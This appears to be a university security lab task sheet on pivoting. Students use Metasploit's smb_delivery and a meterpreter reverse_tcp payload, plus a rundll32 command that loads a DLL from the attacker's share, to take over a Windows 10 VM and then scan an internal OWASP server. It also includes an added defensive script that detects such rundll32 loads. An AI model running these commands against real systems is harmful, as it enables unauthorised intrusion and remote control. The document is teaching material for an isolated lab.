WEEK 7 – TASK P
Pass Task.
Release Date: 26/8-2/9/2024
Learning Outcomes
• Demonstrate compromising a web server in the internal network using the pivoting
technique.
• Implement port scanning for a web server using Metasploit.
• Demonstrate understanding of web server threats and hacking.
• Reflect on Module 7 learning experience.
Instructions
An answer sheet template is available on OnTrack under 'Resources'. Please
download the answer sheet and fill it in with your answers. To upload to OnTrack, you need to
convert the answer sheet template document to PDF. MS Word includes built-in PDF
conversion capability.
All questions/tasks that have the icon below must be attempted for you to complete this
task. If screenshots are required, please ensure that text in screenshots is readable.
Remember that troubleshooting technical problems is part of learning in this field. Tasks
are not step-by-step guides. You need to be in the driver's seat and learn concepts by doing, as
you would when you start your future job (many times even your supervisor does not know the
answer to problems you face). Do your research patiently to solve issues you face and if you
are stuck:
Help is always available in SIT379/704. Please go to Discussions and ask your questions
about this task in Week 7 P. Also, extra support and help are provided on IT helphub.
All students are encouraged to participate and help peers with their questions via the
peer-support channel on Teams. Helping others is a great way to learn and think about aspects
you may have overlooked. You can also seek help from tutors during online and
face-to-face workshops. Please do not raise your questions through OnTrack or email.
Note: This task includes three sections (A, B, and C) that cover different aspects of achieving learning
outcomes. Students will provide evidence of completing tasks and learning and reflect on their learning.
Hacking Web server in internal network through Windows 10.
In this task, you will attempt to access the OWASP Broken Web Apps using a Windows 10
machine. Since the OWASP Web app's VM is on a different subnetwork and you do not have
a direct connection, you will use the Windows 10 machine as an intermediary. This technique
is known as pivoting. Please refer to Module 4 for a detailed explanation. To proceed, we need
to reconfigure our VMs to be on two different subnetworks. Change the network settings for
the OWASP web apps to connect to "intnet2".
[Network diagram]
pfSense: WAN x.x.x.x; eth0 192.168.1.x
Kali Linux VM: eth0 192.168.1.x
Windows 10: eth0 192.168.1.x; eth1 192.168.2.x
OWASP Web Apps VM: eth1 192.168.2.x
To successfully carry out this attack, you need to enable the old version of SMB in Windows
10. Follow these steps:
1. Type "control" in the search box and select "Control Panel" from the best match.
2. Change the "View by" setting to "Category," then click on the "Programs" section.
3. Click on the "Turn Windows features on or off" link.
4. Expand the "SMB 1.0/CIFS File Sharing Support" section and check the box for
"SMB 1.0/CIFS Client."
5. Click the "OK" button to save the changes and restart your computer.
6. Restart the virtual machine (VM).
1. On your Kali machine, open Metasploit and then enter the following commands:
a. use exploit/windows/smb/smb_delivery
b. set payload windows/meterpreter/reverse_tcp
c. set LHOST “Kali machine IP address”
d. set LPORT 1337
f. exploit
smb_delivery serves payloads via an SMB server and provides commands to retrieve
and execute the generated payloads. It currently supports DLLs and PowerShell.
2. To execute the command provided by Metasploit, follow these steps on the Windows 10
machine: 1) Open the Run dialog by pressing Win + R. 2) Enter the following command:
rundll32.exe \\Kali IP address\****\test.dll,0. 3) Press Enter to run the command.
Rundll32.exe is a Microsoft-signed binary used to load dynamic link libraries (DLLs)
in Windows. Attackers abuse it to evade security measures and execute malicious code (for more
details, see: https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code).
3. A new session will open with Windows 10. Press Enter, and the Meterpreter shell will
launch. Then, type sessions 1 and press Enter (see Figure).
4. Type "shell" and the Command Prompt in Windows 10 will open. Next, type "ipconfig" to
retrieve the IP address for the internal network. You should see two interfaces listed: one
corresponding to the connection with the Kali Linux/pfSense network and the other to the
interface connecting with OWASP Broken Web Apps.
5. Once you have the IP address and subnet details for the second network, you can initiate a
ping sweep to identify active devices. This can be achieved using Python or a Batch script.
Since we already know the IP address of OWASP, there is no need to ping all numbers; we
can specifically target that IP to pinpoint the OWASP Broken Web Apps VM's address.
6. Once you have the IP address of the OWASP Broken Web Apps VM, you should perform port
scanning to get information about running services. Exit from this shell, then type
background to save this session.
7. However, before you perform any port scanning, you should add a route from Kali to
the OWASP Broken Web Apps VM's address. You can run the following command
“route add windows 10 IP address/20 1”. Note that the route add command includes the IP
address, the subnet mask and the ID of the meterpreter session (1).
8. Now that you know what systems are on our network and you have a route established to
the compromised machine, the next step is to scan.
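Seen from the defender's side, the rundll32 command in step 2 leaves a distinctive process-creation record: rundll32.exe loading a DLL from a UNC path. The following added example (not part of the original task sheet) flags such command lines in Sysmon-style process-creation events; the sample events, host names, share name and the trusted_hosts allowlist are constructed for illustration.

```python
import re

# rundll32 whose first argument is a UNC path (\\host\share\file.dll,entry).
UNC_TARGET = re.compile(
    r"""rundll32(?:\.exe)?["']?\s+      # binary, bare or ending a quoted full path
        ["']?\\\\(?P<host>[^\\\s"']+)   # remote host
        \\(?P<share>[^\\"']+)           # share name
        \\(?P<path>[^"',]+)             # file path, up to the ,entrypoint
    """,
    re.IGNORECASE | re.VERBOSE,
)

# Constructed events using Sysmon Event ID 1 field names (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WIN10-LAB", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe \\192.0.2.10\share\test.dll,0"},
    {"Computer": "WIN10-LAB", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\RunDll32.exe" "\\192.0.2.10\share\x.dll",0'},
    {"Computer": "WIN10-LAB", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"Computer": "WIN10-LAB", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe \\fileserver01\apps\printui.dll,PrintUIEntry /il"},
]


def basename(path):
    """Last component of a Windows path."""
    return path.rsplit("\\", 1)[-1]


def find_remote_dll_loads(events, trusted_hosts=()):
    """Return one finding per event where rundll32 loads from an untrusted UNC host."""
    trusted = {h.lower() for h in trusted_hosts}  # assumed allowlist of file servers
    findings = []
    for ev in events:
        m = UNC_TARGET.search(ev.get("CommandLine", ""))
        if not m or m.group("host").lower() in trusted:
            continue
        findings.append({
            "computer": ev.get("Computer"),
            "remote_host": m.group("host").lower(),
            "dll": basename(m.group("path")),
            "parent": basename(ev.get("ParentImage", "")).lower(),
        })
    return findings


if __name__ == "__main__":
    for hit in find_remote_dll_loads(SAMPLE_EVENTS, trusted_hosts=["fileserver01"]):
        print(hit)
```

A parent of explorer.exe is consistent with a launch from the Run dialog, which is worth keeping in the finding for triage.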
Task A1: Run “use auxiliary/scanner/portscan/tcp” and specify the RHOSTS and
PORTS (1-500) to perform port scanning. What were the main services running? You must
provide a screenshot of the output.
Task A2: If you want to open the OWASP web apps website remotely in Windows 10
through this Metasploit session, what could you do? Provide a screenshot of your command
and output. Hint: Use the “shell”.
Note: If you aim to get a D, please check the D task, as you will continue
the same session.
B. Evidence of learning
Task B1: Provide evidence of your work on module 1. This can contain notes you
took, activities you solved, and any other work you produced. You can scan or take pictures
or screenshots of your work into a pdf document. It is a good idea to include short
comments together with your evidence.
C. Reflecting on the content and your learning
Task C1: Reflect on what you have learned this week. What is the most important
thing you learnt in this module? How does this relate to what you already know? Why do
you think your course team wants you to learn the content of this module?